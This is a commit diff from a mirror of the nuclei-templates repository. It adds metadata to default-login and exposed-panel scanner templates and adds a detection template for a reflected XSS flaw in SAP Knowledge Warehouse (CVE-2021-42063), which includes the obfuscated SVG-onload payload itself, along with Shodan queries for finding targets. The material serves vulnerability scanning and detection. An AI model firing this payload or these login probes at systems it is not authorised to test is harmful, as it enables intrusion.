daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'projectdiscovery:master' into master

patch-1
idealphase 2022-03-24 11:40:55 +07:00 committed by GitHub
parent 870bf14854 fce3987d9d
commit 03d2c4a152
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
17 changed files with 192 additions and 21 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
.github/workflows/new-templates.yml vendored
View File

@ -9,6 +9,7 @@ on:
jobs:
templates:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps:
- uses: actions/checkout@master
with:

4
.github/workflows/template-db-indexer.yml vendored
View File

@ -2,8 +2,8 @@ name: 📑 Template-DB Indexer
on:
push:
tags:
- '*'
branches:
- master
workflow_dispatch:
jobs:

1
.new-additions
View File

@ -2,6 +2,7 @@ cnvd/2021/CNVD-2021-14536.yaml
cves/2020/CVE-2020-17456.yaml
cves/2020/CVE-2020-27467.yaml
cves/2021/CVE-2021-41691.yaml
cves/2021/CVE-2021-42063.yaml
cves/2022/CVE-2022-0437.yaml
exposed-panels/beyondtrust-login-server.yaml
exposed-panels/beyondtrust-panel.yaml

46
cves/2021/CVE-2021-42063.yaml Normal file
View File

@ -0,0 +1,46 @@
id: CVE-2021-42063
info:
name: SAP Knowledge Warehouse (KW) - Reflected XSS
author: pdteam
severity: medium
description: |
A security vulnerability has been discovered in the SAP Knowledge Warehouse - versions 7.30, 7.31, 7.40, 7.50. The usage of one SAP KW component within a Web browser enables unauthorized attackers to conduct XSS attacks, which might lead to disclose sensitive data.
reference:
- https://seclists.org/fulldisclosure/2022/Mar/32
- https://packetstormsecurity.com/files/166369/SAP-Knowledge-Warehouse-7.50-7.40-7.31-7.30-Cross-Site-Scripting.html
- https://twitter.com/MrTuxracer/status/1505934549217382409
- https://nvd.nist.gov/vuln/detail/CVE-2021-42063
metadata:
shodan-query:
- 'SAP NetWeaver Application Server'
- 'http.component:"SAP"'
tags: cve,cve2021,sap,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-42063
cwe-id: CWE-79
requests:
- method: GET
path:
- "{{BaseURL}}/SAPIrExtHelp/random/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<SVG ONLOAD=&#97&#108&#101&#114&#116(&#X64&#X6F&#X63&#X75&#X6D&#X65&#X6E&#X74&#X2E&#X64&#X6F&#X6D&#X61&#X69&#X6E)>"
- "SAPIKS2"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

10
default-logins/alibaba/canal-default-login.yaml
View File

@ -3,8 +3,16 @@ id: canal-default-login
info:
name: Alibaba Canal Default Login
author: pdteam
description: An Alibaba Canal default login was discovered.
severity: high
tags: alibaba,default-login
reference:
- https://github.com/alibaba/canal/wiki/ClientAdapter
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -33,3 +41,5 @@ requests:
words:
- 'data":{"token"'
- '"code":20000'
# Enhanced by mp on 2022/03/22

13
default-logins/alphaweb/alphaweb-default-login.yaml
View File

@ -4,8 +4,15 @@ info:
name: AlphaWeb XE Default Login
author: Lark Lab
severity: medium
description: An AlphaWeb XE default login was discovered.
tags: default-login
reference: https://wiki.zenitel.com/wiki/AlphaWeb
reference:
- https://wiki.zenitel.com/wiki/AlphaWeb
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.8
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -32,4 +39,6 @@ requests:
- type: status
status:
- 200
- 200
# Enhanced by mp on 2022/03/22

12
default-logins/ambari/ambari-default-login.yaml
View File

@ -3,8 +3,16 @@ id: ambari-default-login
info:
name: Apache Ambari Default Login
author: pdteam
severity: medium
description: An Apache Ambari default admin login was discovered.
severity: high
tags: ambari,default-login,apache
reference:
- https://ambari.apache.org/1.2.0/installing-hadoop-using-ambari/content/ambari-chap3-1.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -24,3 +32,5 @@ requests:
- '"Users" : {'
- 'AMBARI.'
condition: and
# Enhanced by mp on 2022/03/22

13
default-logins/apache/airflow-default-login.yaml
View File

@ -3,11 +3,18 @@ id: airflow-default-login
info:
name: Apache Airflow Default Login
author: pdteam
severity: critical
severity: high
tags: airflow,default-login,apache
reference: https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html
description: An Apache Airflow default login was discovered.
reference:
- https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html
metadata:
shodan-query: title:"Sign In - Airflow"
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -54,3 +61,5 @@ requests:
- type: word
words:
- 'You should be redirected automatically to target URL: <a href="/">'
# Enhanced by mp on 2022/03/22

16
default-logins/apache/apisix-default-login.yaml
View File

@ -1,14 +1,22 @@
id: apisix-default-login
info:
name: Apache Apisix Default Login
name: Apache Apisix Default Admin Login
author: pdteam
severity: critical
severity: high
tags: apisix,apache,default-login
description: An Apache Apisix default admin login was discovered.
metadata:
shodan-query: title:"Apache APISIX Dashboard"
fofa-query: title="Apache APISIX Dashboard"
product: https://apisix.apache.org
reference:
- https://apisix.apache.org/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -39,4 +47,6 @@ requests:
- '"data"'
- '"token"'
- '"code":0'
condition: and
condition: and
# Enhanced by mp on 2022/03/22

11
default-logins/apollo/apollo-default-login.yaml
View File

@ -4,10 +4,17 @@ info:
name: Apollo Default Login
author: PaperPen
severity: high
description: An Apollo default login was discovered.
metadata:
shodan-query: http.favicon.hash:11794165
reference: https://github.com/apolloconfig/apollo
reference:
- https://github.com/apolloconfig/apollo
tags: apollo,default-login
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -47,3 +54,5 @@ requests:
- "status_code_1 == 302 && status_code_2 == 200"
- "contains(tolower(all_headers_2), 'application/json')"
condition: and
# Enhanced by mp on 2022/03/22

10
default-logins/arl/arl-default-login.yaml
View File

@ -1,10 +1,16 @@
id: arl-default-login
info:
name: ARL Default Login
name: ARL Default Admin Login
author: pikpikcu
description: An ARL default admin login was discovered.
severity: high
tags: arl,default-login
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -35,3 +41,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/22

14
default-logins/digitalrebar/digitalrebar-default-login.yaml
View File

@ -1,11 +1,19 @@
id: digitalrebar-default-login
info:
name: RackN Digital Rebar provision default login
name: RackN Digital Rebar Default Login
author: c-sh0
severity: high
reference: https://docs.rackn.io/en/latest/doc/faq-troubleshooting.html?#what-are-the-default-passwords
description: A RackN Digital Rebar default login was discovered.
reference:
- https://docs.rackn.io/en/latest/doc/faq-troubleshooting.html?#what-are-the-default-passwords
- https://rackn.com/
tags: rackn,digitalrebar,default-login
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -38,3 +46,5 @@ requests:
- 'Name'
- 'Secret'
condition: and
# Enhanced by mp on 2022/03/22

14
default-logins/mantisbt/mantisbt-default-credential.yaml
View File

@ -1,12 +1,20 @@
id: mantisbt-default-credential
info:
name: MantisBT Default Credential
name: MantisBT Default Admin Login
author: For3stCo1d
severity: high
description: A MantisBT default admin login was discovered.
reference:
- https://mantisbt.org/
metadata:
shodan-query: title:"MantisBT"
tags: mantisbt,default-login
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -34,4 +42,6 @@ requests:
- type: status
status:
- 302
- 302
# Enhanced by mp on 2022/03/22

13
default-logins/stackstorm/stackstorm-default-login.yaml
View File

@ -4,10 +4,17 @@ info:
name: StackStorm Default Login
author: PaperPen
severity: high
description: A StackStorm default admin login was discovered.
metadata:
fofa-query: app="stackstorm"
reference: https://github.com/StackStorm/st2-docker
reference:
- https://github.com/StackStorm/st2-docker
tags: stackstorm,default-login
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
requests:
- raw:
@ -35,4 +42,6 @@ requests:
- type: status
status:
- 201
- 201
# Enhanced by mp on 2022/03/22

15
dns/caa-fingerprint.yaml
View File

@ -1,11 +1,18 @@
id: caa-fingerprint
info:
name: CAA Fingerprint
name: CAA Record
author: pdteam
description: A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.
severity: info
reference: https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record
reference:
- https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record
tags: dns,caa
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cve-id:
cwe-id: CWE-200
dns:
- name: "{{FQDN}}"
@ -22,4 +29,6 @@ dns:
regex:
- 'issue "(.*)"'
- 'issuewild "(.*)"'
- 'iodef "(.*)"'
- 'iodef "(.*)"'
# Enhanced by mp on 2022/03/22

10
exposed-panels/active-admin-exposure.yaml
View File

@ -4,7 +4,15 @@ info:
name: ActiveAdmin Admin Dasboard Exposure
author: pdteam
severity: info
description: An ActiveAdmin Admin dashboard was discovered.
tags: panel,activeadmin
reference:
- https://activeadmin.info/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cve-id:
cwe-id: CWE-200
requests:
- method: GET
@ -16,3 +24,5 @@ requests:
- "active_admin_content"
- "active_admin-"
condition: and
# Enhanced by mp on 2022/03/22

10
exposed-panels/activemq-panel.yaml
View File

@ -4,7 +4,15 @@ info:
name: Apache ActiveMQ Exposure
author: pdteam
severity: info
description: An Apache ActiveMQ implementation was discovered.
reference:
- https://activemq.apache.org/
tags: panel,activemq,apache
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cve-id:
cwe-id: CWE-200
requests:
- method: GET
@ -17,3 +25,5 @@ requests:
- '<h2>Welcome to the Apache ActiveMQ!</h2>'
- '<title>Apache ActiveMQ</title>'
condition: and
# Enhanced by mp on 2022/03/22